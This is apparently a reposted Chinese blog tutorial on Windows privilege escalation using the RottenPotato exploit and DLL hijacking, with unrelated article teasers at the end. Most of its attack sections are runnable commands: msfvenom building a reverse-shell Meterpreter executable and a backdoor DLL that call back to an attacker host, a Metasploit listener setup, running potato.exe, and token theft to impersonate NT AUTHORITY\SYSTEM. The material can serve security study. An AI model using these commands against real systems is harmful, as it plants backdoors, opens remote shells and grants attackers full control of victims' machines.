权限提升:烂土豆 || DLL 劫持.

news2024/12/24 13:12:08

权限提升:烂土豆  || DLL 劫持.

权限提升简称提权,由于操作系统都是多用户操作系统用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行提权。


目录:

权限提升:烂土豆  || DLL 劫持.

提权思想:

RottenPotato (烂士豆) 提权的原理:

DLL 劫持提权原理:

权限提升:烂土豆

 第一步:生成一个后台程序.(木马)

第二步:把刚刚生成的程序 上传到要提权服务器 上.

第三步:直接在我们的服务器上安装 msf .

第四步:在 windows 操作系统执行程序,返回我们服务器( kali )

第五步:如果在直接使用 令牌窃取 无效,而且还是 IIS 权限,则上传 烂土豆.

权限提升:DLL 劫持

第一步:信息收集.(收集有没有第三方软件)

第二步:我们自己安装一个一样的,然后使用 火绒剑  分析进程.

第三步:使用生成一个后门的 DLL 文件.

第四步:把生成的 DLL 文件,放在那个一样的的文件下,把原来的文件重新命名.

第五步:直接在我们的服务器上安装 msf .

第六步:当打开第三方软件时,就会进入.

第七步:使用 令牌窃取 技术进行提权.


免责声明:

严禁利用本文章中所提到的技术进行非法攻击,否则后果自负,上传者不承担任何责任。


提权思想:

RottenPotato (烂士豆) 提权的原理:

(1)欺骗 “NT AUTHORITY \ SYSTEM” 账户通过 NTLM 认证到我们控制的TCP终端。

(2)对这个认证过程使用中间人攻击(NTLM重放),为 “NT AUTHORITY \ SYSTEM”  
账户本地协商一个安全令牌。这个过程是通过一系列的 Windows API 调用实现的。


(3)模仿这个令牌。只有具有 “模仿安全令牌权限” 的账户才能去模仿别人的令牌。
一般大多数的服务型账户 (IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。


所以,一般从web 拿到的 webshell 都是 IIS 服务器权限,是具有这个模仿权限的。
测试过程中,我发现使用已经建好的账户(就是上面说的用户级账户) 去反弹 meterpreter 
然后再去执行 EXP 的时候会失败,但使用菜刀( IIS 服务器权限)反弹 meterpreter 就会成功。
非服务类用户权限无法窃取成功(原理)

操作过程:上传烂土豆--执行烂土豆--利用窃取模块--窃取 SYSTEM-成功

DLL 劫持提权原理:

Windows 程序启动的时候需要 DLL,如果这些 DLL 不存在,则可以通过在应用程序要查找的位置

放置恶意 DLL 来提权。通常,Windows 应用程序有其预定义好的搜索 DLL 的路径,它会根据下面

的顺序进行搜索:

1、应用程序加载的目录

2、C:\Windows\System32

3、C:\Windows\System

4、C:\Windows

5、当前工作目录 Current Working Directory,CWD

6、在 PATH 环境变量的目录(先系统后用户)
操作过程:信息收集(第三方软件)--进程调试--制作 dll 并上传--替换 dll--启动应用后成功

权限提升:烂土豆

 第一步:生成一个后台程序.(木马)

后台程序(木马):https://tianyuk.blog.csdn.net/article/details/123541093

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.105 
lport=4444 -f exe > bgxg.exe
 
// lhost=kali的IP地址 
// lport=端口号(比如4444) 
// -f exe > 文件名.exe


第二步:把刚刚生成的程序 上传到要提权服务器 上.


第三步:直接在我们的服务器上安装 msf .(这里测试我就直接有 kali 中的 msf 了)(二个服务器要可以互通)

msfconsole            //打开 msf 命令

use exploit/multi/handler        //加载模块

set payload windows/meterpreter/reverse_tcp  
// payload 命令:(记得设置的 windows/meterpreter/reverse_tcp 要和程序的一样)   

set lhost 192.168.0.105
//设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)

set LPORT 4444
//设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)

run                //执行命令


第四步:在 windows 操作系统执行程序,返回我们服务器( kali )


第五步:如果在直接使用 令牌窃取 无效,而且还是 IIS 权限,则上传 烂土豆.

烂土豆下载:windows-kernel-exploits/MS16-075 at master · SecWiki/windows-kernel-exploits · GitHub

getuid         //查看权限(是 IIS 权限才使用下面的.)

pwd            //查看当前目录

cd C://        //烂土豆目录下.

execute -cH -f ./potato.exe        //执行烂土豆

use incognito        //窃取令牌模块

list_tokens -u       //查看可以窃取权限

impersonate_token "NT AUTHORITY\SYSTEM"    //窃取权限


权限提升:DLL 劫持

第一步:信息收集.(收集有没有第三方软件)


第二步:我们自己安装一个一样的(第三方软件),然后使用 火绒剑  分析(第三方软件)进程.


第三步:使用生成一个后门的 DLL 文件.

msfvenom -p windows/meterpreter/reverse_tcp lhost=(kali地址) 
lport=端口 -f dll > 和进程一样的文件名.dll


第四步:把生成的 DLL 文件,放在那个一样的(进程)的文件下,把原来的文件重新命名.


第五步:直接在我们的服务器上安装 msf .(这里测试我就直接有 kali 中的 msf 了)(二个服务器要可以互通)

msfconsole            //打开 msf 命令

use exploit/multi/handler        //加载模块

set payload windows/meterpreter/reverse_tcp  
// payload 命令:(记得设置的 windows/meterpreter/reverse_tcp 要和程序的一样)   

set lhost 192.168.0.105
//设置本地监听 IP(就是 kali 的 IP)命令:(记得设置的 IP 要和程序的一样)

set LPORT 4444
//设置本地监听端口(就是 kali 的 端口)命令:(记得设置的 端口 要和程序的一样)

run                //执行命令


第六步:当打开第三方软件时,就会进入.


第七步:使用 令牌窃取 技术进行提权.

getuid        //查看权限
 
use incognito        //窃取令牌模块
 
list_tokens -u       //查看可以窃取权限
 
impersonate_token "NT AUTHORITY\SYSTEM"    //窃取权限

      

    

学习连接:第62天:权限提升-烂土豆&dll劫持&引号路径&服务权限_哔哩哔哩_bilibili

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/481269.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

数字化转型:如何利用文件管理系统提高制造业的工作效率

对于制造行业的企业用户,在日常企业文件管理中会遇到怎样的问题呢?制造业又该该如何高效管理文件呢? 这些问题困扰着机械制造行业客户…… 1)项目多、文件杂,统一管理不便 2)文档资料在公司内部流转不畅 …

14-5-进程间通信-信号

一、信号的基本概述 1.什么是信号? (1)对于linux来说,信号是软中断。比如在终端输入ctrlc来中断正在运行的程序,原理是linux通过信号机制来停止一个程序。 (2)每一个信号都有一个名字和编号&…

Django项目页面样式如何“传给”客户端浏览器

前言 django项目在视图函数中借助render函数可以返回HTML页面,但是HTML页面中如果引入了外部CSS文件或者JavaScript文件在浏览器页面无法加载,因此就必须有一种方式能够将HTML文档中引入的外部文件能够在客户端浏览器上加载,这种方式就是配置…

QML状态与过渡(States and Transitions)

目录 一 状态(States) 一 过渡(Transitions) 通常我们将用户界面描述为一种状态。一个状态定义了一组属性的改变,并且会在一定的条件下被触发。另外在这些状态转化的过程中可以有一个过渡,定义了这些属性…

第二十章 中介者模式

系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目…

SpringSecurity框架学习与使用

SpringSecurity框架学习与使用 SpringSecurity学习SpringSecurity入门SpringSecurity深入认证授权自定义授权失败页面权限注解SecuredPreAuthorizePostAuthorizePostFilterPreFilter 参考 SpringSecurity学习 SpringSecurity入门 引入相关的依赖,SpringBoot的版本…

IPsec中IKE与ISAKMP过程分析(快速模式-消息3)

IPsec中IKE与ISAKMP过程分析(主模式-消息1)_搞搞搞高傲的博客-CSDN博客 IPsec中IKE与ISAKMP过程分析(主模式-消息2)_搞搞搞高傲的博客-CSDN博客 IPsec中IKE与ISAKMP过程分析(主模式-消息3)_搞搞搞高傲的博客…

Spring - IoC

Spring - IoC Spring- IoC1)Spring简介1.1)什么是框架1.2)框架的作用1.3)Spring是什么1.4)Spring的体系结构1.5)Spring的发展历史1.6)Spring优势 2)IoC简介2.1)优质程序代码的制作原则2.2)耦合与内聚2.3)工厂模式发展史2.4)Spring发展历程2.5)IoC 3)入门案例3.1)案例环境说明3.…

synchronized用法加锁原理

目录 使用场景不同场景加锁对象结论验证实验实验1: synchronized 修饰方法,加锁对象是类实例,不同实例之间的锁互不影响实验2: synchronized 加在静态方法上,加锁对象是方法所在类,不同类实例之间相互影响实…

docker镜像导入导出

项目背景 1. docker pull 的时候比较慢的情况下, 之前已经下载过的话,可以直接导入使用 2. 有些服务器不允许上外网的情况下,可以先在自己电脑上下载好,再上传到服务器上进行安装 导出镜像 查看镜像 docker images 导出镜像 …

【文件系统】

目录 1 inode 2 软链接 3 硬链接 1 inode 当我们创建一个文件时,用带上 -i 选项可以查看文件的inode: 其中第一个选项就是文件的inode,除此之外另外几列表示的是: 模式 硬链接数 文件所有者 所属组 大小 最后修改时间文件名 ls -l读取存储在磁盘上的文…

windows编译安卓源码记录

环境 Windows10 vmware17 ubuntu22 ubuntu环境设置 装完ubuntu系统后拖拽复制文件进去验证vmtools安装情况,如果vmtools异常很麻烦,试了n多方法,最后还是重新安装系统解决, 如果ok的话,再继续下步骤,否…

【C++入门第四期】类和对象 ( 上 )

前言类的使用类的定义类的两种定义方式:成员变量名的定义建议 类的访问限定符类的作用域类的实列化如何计算类的大小结构体内存对齐规则 this指针this指针的特性 前言 C语言是面向过程的,关注的是过程,分析出求解问题的步骤,通过…

Linux的目录结构

在Linux世界里,一切皆文件硬件如显卡、cpu等都会映射成一个文件具体的目录结构/bin 是Binary的缩写,这个目录存放着最经常使用的命令 /sbin(/usr/sbin、/usr/local/sbin) s就是Super User的意思,这里存放的是系统管理员使用的系统管理程序 /h…

Elasticsearch扫盲篇

1. 什么是搜索? 在日常的工作和学习中,当我们说想找查询任何的信息的时候,可能第一时间会想到上百度或者谷歌去搜索一下。比如说找一部自己喜欢的电影,或者说找一本喜欢的书,或者找一条感兴趣的新闻。但是百度和谷歌不…

QML基础模型(Basic Model)

最基本的分离数据与显示的方法是使用Repeater元素。它被用于实例化一组元素项,并且很容易与一个用于填充用户界面的定位器相结合。 最基本的实现举例,repeater元素用于实现子元素的标号。每个子元素都拥有一个可以访问的属性index,用于区分不…

第11章 项目人力资源管理

文章目录 项目人力资源管理 过程11.2.1 编制项目人力资源计划的工具与技术 375(1)层次结构图(工作、组织、资源 分解结构)(2)矩阵图(责任分配矩阵,RAM)(3&…

KinectFusion中的ICP算法

投影数据关联-求匹配点 利用算法projective data association对前一帧和当前帧的(Vertex、Normal)进行匹配,算法如下: 在当前帧 i 的深度图像上的每一个像素 U并行计算;对于深度值大于0的像素,求该像素点…

从破解虫脑到攻克人脑:一条“永生之路”的新赛道?

从破解虫脑到攻克人脑:一条“永生之路”的新赛道? 首张果蝇大脑连接组:耗费十余年,重建三千神经元,超50万突触! 论文地址 果蝇幼虫大脑的连接组。 所有脑神经元的形态学都经过了突触分辨率的电子显微镜成像…